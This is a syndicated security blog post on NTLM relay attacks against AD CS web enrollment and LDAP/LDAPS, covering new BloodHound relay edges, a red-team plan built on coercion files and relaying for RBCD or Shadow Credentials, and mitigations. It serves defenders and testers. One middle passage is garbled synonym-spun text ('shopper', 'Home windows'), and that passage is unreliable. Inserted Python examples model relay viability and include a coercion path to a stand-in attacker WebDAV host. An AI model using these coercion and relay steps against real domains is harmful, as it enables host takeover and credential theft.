The ADCS Certificate Authority Web Enrollment endpoint and Certificate Enrollment Web Service run on IIS. IIS doesn't support session security, but it does support Extended Protection for Authentication (EPA), also known as channel binding. EPA is supported over HTTPS, but not HTTP, because HTTP has no secure channel to bind to. So, if web enrollment is available over HTTP, or over HTTPS with EPA disabled, then relay is viable. This is the default configuration on Windows Server 2022 and older, but no longer the default on Windows Server 2025. Note that this applies to any website served by IIS with NTLM authentication, not just ADCS web enrollment.
As mentioned, relaying is all about authentication. Once authenticated, the attacker can do whatever the relay victim is permitted to do. This attack is viable only if the relay victim is permitted to enroll a client authentication certificate (requires EKUs that allow performing Kerberos PKINIT authentication or Schannel authentication to LDAP) and the CA is trusted by the domain controller and added to the domain's NTAuthCertificates. Jonas Bülow Knudsen explains these requirements in detail in this blog post.
Introducing the CoerceAndRelayNTLMToADCS Edge
The new CoerceAndRelayNTLMToADCS edge comes out of the Authenticated Users node and leads into the victim computer node, unlike CoerceAndRelayNTLMToSMB, which leads into the relay target computer node. The reason for the difference is that the attack compromises the relay victim rather than the relay target.
Collection
SharpHound collects all the required information as follows:
- Connect to the ADCS enrollment endpoints and attempt to perform NTLM authentication with and without EPA to determine whether it's enabled, required, or disabled. This can be collected without admin access.
- All the ADCS certificate enrollment requirements are collected via LDAP, as is done for all existing ADCS edges. This can be collected without admin access.
- Outgoing NTLM restriction is collected from the relay victim via WMI or Remote Registry, which requires admin rights.
Edge Creation
BloodHound creates the edge if the following criteria are met:
- The relay victim is a computer permitted to enroll a certificate with a template that meets the requirements listed below. The relay victim must have the enroll permission on the enterprise CA and the certificate template.
- The certificate template has (1) EKUs that enable PKINIT/Schannel authentication, (2) manager approval disabled, and (3) no authorized signatures required.
- The enterprise CA is trusted for NT authentication, and its certificate chain is trusted by the domain controller.
- The enterprise CA published the certificate template.
- The enterprise CA that published the certificate template has a web enrollment endpoint available over HTTP, or over HTTPS with EPA disabled.
- There is no outgoing NTLM restriction on the victim host. In BloodHound Community Edition, if this data wasn't collected/ingested, it is assumed to be false (not restricted), as per the default configuration. In BloodHound Enterprise, this assumption is not made, and the edge won't be created.
- If the domain functional level is Windows Server 2012R2, the relay victim must not be a member of the Protected Users group.
The edge is always created from Authenticated Users to the computer node representing the relay victim.
Expanding the Composition view shows all the components involved, including the certificate template and the enterprise CA to target.
Abuse
After enrolling a certificate, the attacker can perform PKINIT authentication as the computer account using Rubeus to obtain a Kerberos Ticket Granting Ticket (TGT), or even the NT hash of the computer account through the UnPAC the Hash attack. With these, the attacker can compromise the relay victim host via S4U2Self abuse or a silver ticket, or use the TGT or the NT hash to access any resource that the computer account is permitted to access.
If the CA is susceptible to relay attacks, all the computers that can enroll a suitable certificate are exposed. Note that the default "Machine" certificate template meets the above criteria and exposes all the computers in the domain.
ADCS-Specific Limitations
The CoerceAndRelayNTLMToADCS edge only covers scenarios in which a computer (victim) can enroll a domain authentication certificate and the certificate authority's web enrollment (target) is vulnerable to relay attacks. It doesn't cover user accounts as the relay victim, and it doesn't cover certificate templates incompatible with domain authentication.
Other limitations that apply to all new NTLM relay edges will be discussed later.
Focusing on LDAP or LDAPS
The brand new CoerceAndRelayNTLMToLDAP and CoerceAndRelayNTLMToLDAPS edges are by much more difficult to abuse. In contrast to SMB and IIS, LDAP servers are applied to require the capabilities negotiated with the shopper within the NTLM alternate, that means that if the shopper negotiates session safety with signing, the LDAP server would require all the following messages within the session to be signed with the session key.
Laptop account authentication coercion can set off authentication from the SMB shopper, however the SMB shopper at all times negotiates session safety with signing within the NTLM Authenticate message, so SMB can’t be relayed to LDAP. The exception to this rule is purchasers which have NTLMv1 enabled as a result of, in NTLMv1, the MIC will be dropped, and the Negotiate Signal flag will be reset.
However that’s not a useless finish. Some authentication coercion primitives, together with the Printer Bug and PetitPotam, settle for WebDAV paths just by including the at signal adopted by a port quantity to the hostname, e.g., “attackerhost@80iconsurl.icon”.
WebDAV is encapsulated in HTTP messages despatched by the Internet Consumer service, which doesn’t negotiate signing and is, subsequently, suitable with relaying to LDAP. Nonetheless, by default, the Internet Consumer would solely authenticate to targets within the Intranet Zone, as per the default Web Settings.
Getting within the (Intranet) Zone
HTTP purchasers in Home windows ought to name the MapUrlToZoneEx2 perform to find out which zone a given URL belongs to. The perform determines {that a} URL maps to the Intranet Zone based mostly on the next guidelines:
- Direct Mapping: URLs manually added to the Intranet Zone
- The PlainHostName Rule (aka “The Dot Rule”): If the URL’s hostname doesn’t comprise any dots
- Fastened Proxy Record Bypass: Websites added to the mounted proxy bypass record
- WPAD Proxy Script: URLs for which the proxy script returns “DIRECT”
In the event you use the host’s “shortname” (the hostname portion of the FQDN, e.g., hostname.contoso.native) or NetBIOS identify, the underlying identify decision mechanisms will resolve the identify to an IP deal with, despite the fact that the URL is “dot-less”, as a result of DNS mechanically appends a suffix based mostly on the shopper’s DNS search record, which is often configured by way of DHCP or GPO.
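An added example, not from the article and not Windows' own MapUrlToZoneEx2, that models the four rules above for a WebDAV-style target and shows why a dot-less attacker hostname still resolves through the DNS suffix search list. The UNC parsing, the rule order and the WPAD callback are assumptions of this illustration.

```python
# Added example, not from the article or from Windows itself: a model of how a
# WebDAV target lands in the Intranet Zone under the four rules listed above.
# The rule order, the UNC parsing and the WPAD callback are assumptions here.
from dataclasses import dataclass, field
from typing import Callable, Optional, Tuple
from urllib.parse import urlsplit

def parse_target(path: str) -> Tuple[str, Optional[int], bool]:
    """Return (hostname, port, tls) for a UNC WebDAV path such as
    \\\\host@80\\share or \\\\host@SSL@443\\share, or for an http(s) URL.
    In UNC form, '@<port>' is what turns an SMB path into a WebDAV request."""
    if path.startswith("\\\\"):
        netloc = path[2:].split("\\", 1)[0]
        host, *flags = netloc.split("@")
        tls = any(f.upper() == "SSL" for f in flags)
        ports = [int(f) for f in flags if f.isdigit()]
        return host.lower(), (ports[0] if ports else None), tls
    u = urlsplit(path)
    return (u.hostname or "").lower(), u.port, u.scheme == "https"

@dataclass
class ZoneConfig:
    intranet_sites: set = field(default_factory=set)  # Direct Mapping
    proxy_bypass: set = field(default_factory=set)    # fixed proxy bypass list
    wpad: Optional[Callable[[str], str]] = None       # url -> "DIRECT" / "PROXY ..."

def intranet_zone_reason(path: str, cfg: ZoneConfig) -> Optional[str]:
    """Name the rule that maps the target to the Intranet Zone, or None."""
    host, _port, _tls = parse_target(path)
    if not host:
        return None
    if host in cfg.intranet_sites:
        return "direct-mapping"
    if "." not in host:                  # PlainHostName, "the dot rule"
        return "dot-rule"
    if host in cfg.proxy_bypass:
        return "proxy-bypass"
    if cfg.wpad and cfg.wpad(path).upper().startswith("DIRECT"):
        return "wpad-direct"
    return None

def dns_search_candidates(host: str, search_list: list) -> list:
    """FQDNs a dot-less name is tried as, via the client's DNS suffix search list."""
    return [host] if "." in host else [f"{host}.{s}" for s in search_list]

# Constructed sample: a coercion path pointing at a dot-less attacker hostname.
SAMPLE_PATH = "\\\\attackerhost@80\\share"
DEFAULT_CFG = ZoneConfig()
```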
But how do we get DNS resolution for our attacker-controlled host?
Bring Your Own DNS Record
By default, Active Directory Integrated DNS allows all Authenticated Users to create DNS records via LDAP or Dynamic DNS (DDNS), as discussed in this blog post by Kevin Robertson, and this can be done with his tools Powermad and Sharpmad.
WebDAV Is a Hit or Miss
Authentication coercion can trigger WebDAV traffic only if the Web Client service is installed on the host, which it is by default on Windows desktops, but on Windows servers it requires the Desktop Experience or the WebDAV Redirector feature. Even if it is installed, it also needs to be running, which isn't the default on desktops. Most user account authentication coercion primitives will automagically trigger the Web Client service to start. However, computer accounts are more difficult. While most computer account authentication coercion primitives support WebDAV paths, they won't start the Web Client service. Therefore, when we target computer accounts, which is what we do here, we're limited to computers that currently have the Web Client service already running.
When the Web Client service starts, it opens a named pipe called DAV RPC SERVICE, so we can determine remotely whether it's running without admin rights.
One important thing to note is that when the Web Client service runs, it affects all processes running on the host in any context, not just the user who started it. Therefore, if we trigger the service to start via user account authentication coercion, for example, by dropping an authentication coercion file into a heavy-traffic shared folder, any user that browses the share potentially exposes the host they logged in on to NTLM relay to LDAP.
LDAP Relay Mitigations
LDAP servers support mitigating relay attacks with LDAP signing and LDAP channel binding. Each can be configured separately, and both must be enforced to prevent relay attacks. If either one isn't, there's a bypass:
- If LDAP signing is required and LDAP channel binding is disabled, the attacker can relay to LDAPS instead of LDAP, and since LDAPS encapsulates the traffic in a TLS channel, the domain controller considers the signing requirement to be met.
- If LDAP channel binding is enforced and LDAP signing is disabled, the attacker can relay to LDAP with StartTLS, as discussed in this blog post, because the TLS channel is established only post-authentication.
These settings are DC-level settings, not domain-level settings, meaning that you may find different domain controllers with different configurations in the same environment.
Up until Windows Server 2025, domain controllers didn't enforce these by default, and given that most organizations haven't yet changed both of these settings, today, most domain controllers out there are vulnerable to NTLM relay attacks. However, as of Windows Server 2025, domain controllers enforce encryption (sealing) via session security on LDAP SASL bind by default, and with that new configuration, relaying to LDAP or LDAPS is no longer viable. But today, domain controllers running on Windows Server 2025 are still few and far between.
Note that enabling LDAP client signing doesn't mitigate relay attacks, as we're not abusing LDAP clients; we're abusing web clients.
Viability Criteria
All things considered, relaying to LDAP is viable under the following circumstances.
For the relay target, there is at least one domain controller that:
- Is running on Windows Server 2022 or older and doesn't require LDAP signing, or has LDAPS turned on without channel binding.
- Is running on Windows Server 2025 with LDAP signing explicitly disabled.
For the relay victim, the computer must either have the Web Client installed and running or have NTLMv1 enabled.
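The viability criteria and the signing/channel binding bypasses above, as an added example that is not SharpHound's or BloodHound's code: it takes collected domain controller settings and a victim's status and reports which relay channels and which edges would result, including the Community Edition versus Enterprise handling of an uncollected outgoing NTLM restriction. Field names and the sample environment are assumptions of this illustration.

```python
# Added example, not SharpHound/BloodHound code: applies the LDAP relay
# viability criteria and the signing/channel binding bypasses described
# above to collected settings.  Field names and samples are assumptions.
from dataclasses import dataclass
from typing import Optional

@dataclass
class DomainController:
    name: str
    os_year: int                      # 2022 or older, or 2025
    ldap_signing_required: bool
    ldaps_enabled: bool
    channel_binding_required: bool
    signing_explicitly_disabled: bool = False   # only matters on 2025

@dataclass
class Victim:
    name: str
    web_client_running: bool          # DAV RPC SERVICE pipe observed
    ntlmv1_enabled: bool = False
    outgoing_ntlm_restricted: Optional[bool] = None  # None = not collected
    protected_user: bool = False

def relay_channels(dc: DomainController) -> set:
    """Channels an attacker could relay a WebDAV NTLM exchange into on this DC."""
    chans = set()
    if dc.os_year >= 2025:
        # Sealing is enforced on SASL bind by default; only an explicit
        # "signing disabled" override reopens plain LDAP.
        if dc.signing_explicitly_disabled:
            chans.add("LDAP")
        return chans
    if not dc.ldap_signing_required:
        chans.add("LDAP")
        if dc.channel_binding_required:
            chans.add("LDAP+StartTLS")   # TLS is established only post-auth
    if dc.ldaps_enabled and not dc.channel_binding_required:
        chans.add("LDAPS")               # TLS satisfies the signing requirement
    return chans

def victim_viable(v: Victim, enterprise_edition: bool) -> bool:
    """Victim-side prerequisites: HTTP-capable coercion and no outgoing NTLM block."""
    if not (v.web_client_running or v.ntlmv1_enabled):
        return False
    if v.outgoing_ntlm_restricted is None:
        return not enterprise_edition   # CE assumes the unrestricted default
    return not v.outgoing_ntlm_restricted

def relay_edges(dcs, v: Victim, enterprise_edition=False, dfl_2012r2=False) -> dict:
    """Map edge name -> DC names that would be listed under Relay Targets."""
    edges = {}
    if not victim_viable(v, enterprise_edition):
        return edges
    for dc in dcs:
        chans = relay_channels(dc)
        if chans & {"LDAP", "LDAP+StartTLS"}:
            edges.setdefault("CoerceAndRelayNTLMToLDAP", set()).add(dc.name)
        if "LDAPS" in chans and not (dfl_2012r2 and v.protected_user):
            edges.setdefault("CoerceAndRelayNTLMToLDAPS", set()).add(dc.name)
    return edges

# Constructed sample: mixed DC configurations in one environment.
DCS = [
    DomainController("DC01", 2022, False, True, False),   # nothing enforced
    DomainController("DC02", 2022, True, True, False),    # signing only
    DomainController("DC03", 2022, False, True, True),    # channel binding only
    DomainController("DC04", 2022, True, True, True),     # both enforced
    DomainController("DC05", 2025, True, True, True),     # 2025 defaults
]
WS = Victim("WS01$", web_client_running=True)
```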
I Successfully Relayed to LDAP. Now What?
As I reiterated several times, relaying gets you through the authentication step. What you can do with the session afterward depends on the permissions of the relay victim. A successful relay to LDAP allows you to perform any action that the relay victim is permitted to perform in Active Directory, with one caveat: a password change/reset must happen over an encrypted channel, so that action is possible only when relaying to LDAPS.
In this scenario, we coerce and relay a computer account to LDAP or LDAPS. In this case, it is very unlikely that the relay victim, a computer account, has high privileges in the domain. However, computers are allowed to change some attributes of their own computer account, including:
- msDS-AllowedToActOnBehalfOfOtherIdentity, which allows taking over the host via Resource-Based Constrained Delegation (RBCD), as explained in detail in this post.
- msDS-KeyCredentialLink, which allows taking over the host via the Shadow Credentials attack, as explained in detail in this post. Note that a computer account is permitted to add a new value to the msDS-KeyCredentialLink attribute as a validated write only if there isn't an existing key credential already present. However, even if there is already a key credential present, the computer account is allowed to delete it and then add a new one, which requires relaying twice: once for the deletion and a second time for the Shadow Credentials attack.
Introducing the CoerceAndRelayNTLMToLDAP and CoerceAndRelayNTLMToLDAPS Edges
The new CoerceAndRelayNTLMToLDAP and CoerceAndRelayNTLMToLDAPS edges come out of the Authenticated Users node and lead into the victim computer node, just like the CoerceAndRelayNTLMToADCS edge, because here, too, the attack compromises the relay victim rather than the relay target.
Collection
SharpHound collects all the required information as follows:
- Connect to the domain controllers via LDAP and LDAPS and attempt to perform NTLM authentication with and without signing and channel binding to determine whether they're enabled, required, or disabled. This can be collected without admin access.
- Connect to the relay victim via SMB to check whether the DAV RPC SERVICE named pipe is open. This can be collected without admin access.
- Outgoing NTLM restriction is collected from the relay victim via WMI or Remote Registry, which requires admin rights.
Edge Creation
BloodHound creates the CoerceAndRelayNTLMToLDAP edge if the following criteria are met:
- There is at least one domain controller running on Windows 2022 or older, and LDAP signing is required.
- The relay victim has the Web Client service running.
- There is no outgoing NTLM restriction on the victim host. In BloodHound Community Edition, if this data wasn't collected/ingested, it is assumed to be false (not restricted), as per the default configuration. In BloodHound Enterprise, this assumption is not made, and the edge is not created.
BloodHound creates the CoerceAndRelayNTLMToLDAPS edge if the following criteria are met:
- There is at least one domain controller running on Windows 2022 or older, and LDAPS is available without channel binding required.
- The relay victim has the Web Client service running.
- There is no outgoing NTLM restriction on the victim host. In BloodHound Community Edition, if this data wasn't collected/ingested, it is assumed to be false (not restricted), as per the default configuration. In BloodHound Enterprise, this assumption is not made, and the edge is not created.
- If the domain functional level is Windows Server 2012R2, the relay victim must not be a member of the Protected Users group.
The edge is always created from Authenticated Users to the computer node representing the relay victim.
Expanding the Relay Targets section in the information panel lists all the affected domain controllers that can be targeted.
Abuse
As mentioned above, following a successful relay, the relay victim can configure RBCD or Shadow Credentials against its own computer account to compromise the host. In addition, if the computer account happens to have any abusable permissions in Active Directory, those are viable as well, with the caveat that the ForcePasswordChange edge (password reset) is only abusable via LDAPS and not via LDAP.
In the real world, it is very common to find domain-joined workstations with the Web Client running, and domain controllers are very rarely configured to require both LDAP signing and channel binding or to run on Windows Server 2025, so this is a very rel(a)yable way to compromise domain-joined hosts. It's even more common to abuse this technique for local privilege escalation on domain-joined workstations because of the ease of turning the Web Client service on and coercing authentication from SYSTEM as a low-privileged user.
LDAP-Specific Limitations
You may have noticed that BloodHound currently doesn't take NTLMv1 into account for edge creation.
Another important limitation to note is that the CoerceAndRelayNTLMToLDAP and CoerceAndRelayNTLMToLDAPS edges are created based on the current Web Client service status, which is very dynamic. The fact that the service was not running on a host during collection doesn't mean it will stay that way or that the host is not exposed.
General Limitations
So far, we've discussed some limitations affecting specific edge types. There are also limitations affecting all the new NTLM relay edges:
- Only computer account authentication coercion scenarios are considered. User authentication coercion is out of scope at this time.
- Only coercion scenarios are considered. Opportunistic relay attacks, i.e., waiting for a suitable relay victim to authenticate to an attacker-controlled host, such as authenticated vulnerability scanners, are out of scope.
- Firewalls and other forms of network restrictions are out of scope and not taken into account for these new relay edges, just as they weren't taken into account for any of the previous BloodHound edges.
We also make the general assumption that computer account authentication coercion can be triggered by Authenticated Users, as explained earlier.
Future Work
We plan to introduce more relay edges in the future. We already have relay to MS SQL and WinRM on our roadmap. We're always open to suggestions if you have more ideas/requests.
NTLM Abuse Strategy
Let's take everything covered in this post and put together an NTLM abuse strategy.
First, let's make some observations and assumptions:
- NTLM challenge-response capture is less noisy than NTLM relay, but cracking depends on the strength of the password.
- User authentication coercion can trigger the Web Client service to start, but computer authentication coercion can't.
- Scanning for hosts with the Web Client service running can be noisy. Similarly, collecting session information is noisy or even impossible without local admin rights.
- NTLM relay attacks should be precise on red team operations. The "Spray and Pray" approach should be avoided.
Given the above, I suggest the following approach:
- At the beginning of an op/assessment, cast a wide net for user authentication coercion via watering hole attacks on high-traffic file shares or web pages. Try to coerce and capture both WebDAV and SMB traffic if you can. SMB is generally more likely to succeed, but this is your opportunity to start the Web Client service on every affected client.
- As you capture NTLM responses, keep track of where users authenticate from: it tells you where they have a session. It is, in a way, passive session collection.
- Attempt to crack the passwords of interesting accounts that can help you escalate privileges or achieve your objectives. Don't waste your GPU on meaningless accounts.
- If you identify an interesting user but can't crack the password, it's time to relay.
- Target the computer on which the user was active and compromise it via relay to ADCS (ESC8) or via relay to LDAP/LDAPS (RBCD or Shadow Credentials).
- Once you gain admin access to the host, you can potentially avoid the risk involved in lateral movement and credential abuse by placing an authentication coercion file on the user's desktop via the C$ share and relaying the NTLM exchange to the target resource.
What's Microsoft Doing About It?
Microsoft has been making efforts to mitigate these attacks. As I mentioned, relaying to LDAP is no longer possible against domain controllers running Windows Server 2025, and all Windows 11 and Windows Server 2025 hosts now require SMB signing by default. It's a good start.
Microsoft has been working on a much more significant initiative to deprecate NTLM altogether. They've identified the following reasons why Windows hosts still use NTLM and have started working on solutions:
- Until recently, the only option for local account authentication was NTLM. Microsoft is in the process of rolling out a "local KDC" to support Kerberos authentication for local accounts.
- When clients don't have a line of sight to a domain controller, they can't obtain Kerberos tickets and have to fall back to NTLM. Microsoft is in the process of rolling out IAKERB, which will turn every Windows host into a Kerberos proxy.
- Kerberos authentication requires mapping the resource that the client is trying to access to a service account. This is done via service principal names (SPN). SPNs usually use hostnames rather than IP addresses, so when a client attempts to access a resource by IP address, Kerberos authentication typically fails. However, as of Windows Server 2016, SPNs with IP addresses are supported.
- Most NTLM usage is a result of software hard-coded to call the NTLM authentication package instead of the Negotiate package, which wraps Kerberos and NTLM and negotiates the best option. Microsoft has been working on fixing these hard-coded issues in its own software, and, rumor has it, they've also been working with third parties to fix their code.
Microsoft intends to have NTLM disabled by default (not completely removed), which means that even when the day finally comes, we'll likely still find organizations that turn it back on, just as we still find hosts with NTLMv1 enabled. Last I heard, Microsoft had plans to have it done by 2028, but I believe they're already delayed, and, if history has taught us anything, we should suspect it will take much longer than that.
Kerberos is NOT the Solution
For many years, people thought that Kerberos was not susceptible to relay attacks because it's based on tickets, and every ticket is issued to a specific service, so you can't relay it to arbitrary targets. But that's no longer the case. As James Forshaw discovered and Andrea Pierini weaponized, there are authentication coercion primitives that allow the attacker to control the service name for which the relay victim obtains a Kerberos ticket. These coercion primitives negotiate session security with signing, so they can't be relayed to LDAP/LDAPS. However, they're compatible with relaying to SMB and ADCS.
Therefore, disabling NTLM is not the solution. Ensuring all servers enforce signing and channel binding is the right way to mitigate relay attacks.
We may add Kerberos relay edges to BloodHound in the future. Until then, you can be confident that whenever you see CoerceAndRelayNTLMToADCS or CoerceAndRelayNTLMToSMB edges, you can relay either NTLM or Kerberos.
Why Are We Releasing It Now?
There are many misconceptions about the problem and the solution for the NTLM relay issues. The new edges we released into BloodHound will hopefully bring clarity and put it in the spotlight, helping organizations prioritize one of the most critical yet underestimated risks affecting Active Directory environments.
Better Remediation Strategies
The remediation guidance for NTLM relay attacks is often "enforce everything, everywhere", which isn't very practical in a large environment that requires backward compatibility. However, BloodHound now helps defenders see what's actually viable in their environments and prioritize high-impact/exposure targets. BloodHound has a set of pre-built Cypher queries that can get you started with that.
Conclusion
NTLM relay attacks are far from dead. In fact, they're often easier to execute and more effective than many security practitioners realize. This old technique remains one of the paths of least resistance in modern Active Directory environments, routinely enabling trivial pivots to high-value targets. The introduction of NTLM relay edges in BloodHound has made identifying and visualizing these attack paths remarkably simple: with just a few clicks, an operator can see how Authenticated Users can relay their way from zero to hero. In other words, BloodHound now depicts, with clear, intuitive edges, what once required stitching together information from multiple tools, showing defenders the real risks they face while allowing attackers to, once again, think in graphs.
The Renaissance of NTLM Relay Attacks: Everything You Need to Know was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.
*** This is a Security Bloggers Network syndicated blog from Posts By SpecterOps Team Members on Medium, authored by Elad Shamir. Read the original post at: https://posts.specterops.io/the-renaissance-of-ntlm-relay-attacks-everything-you-need-to-know-abfc3677c34e